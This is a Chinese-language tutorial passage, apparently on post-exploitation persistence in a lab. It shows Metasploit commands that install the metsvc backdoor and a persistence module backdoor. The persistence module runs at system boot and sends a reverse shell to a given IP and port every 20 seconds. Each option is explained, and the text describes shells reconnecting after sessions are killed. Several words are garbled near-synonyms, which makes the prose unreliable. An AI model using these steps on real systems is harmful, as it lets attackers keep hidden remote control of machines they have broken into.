就算漏洞修复后 也一样能 坚持掌握。Msf的shell是运行在内存里面 如果主机重启了 那么shell就失落效了。
Metsvc 植入后门
run metsvc -A
实行成功 可以看到靶机上面已经上传了3个文件
Msf 里面查看后台任务
可以看到已经有个直连的监听程序已经在运行了
重启靶机
这里没有连接上可能是 windows自带杀软 或是uac 防火墙导致的
这个后门不能设置密码而且只能固定的端口 很随意马虎被创造
利用persistence模块进行后门植入
这个和上面那个的不同点是这个是启动项植入 而且可以设置回连韶光和端口
run persistence -h
-A 自动打开监听程序
-u 当用户登录自动进行回连
-X 当系统开机自动运行后门
-I 隔多少秒进行一次回连
-p 指定端口
-r 要反弹的连接的主机
run persistence -X -A -i 20 -p 6666 -r 192.168.10.8
然后background 后台运行 查看目前在运行的任务
可以看到自动天生了有个监听
过了会 反弹回来了有个shell
把sessions 6给kill掉 看看他过会还会不会反弹多个shell回来
隔了一会反弹了个session回来
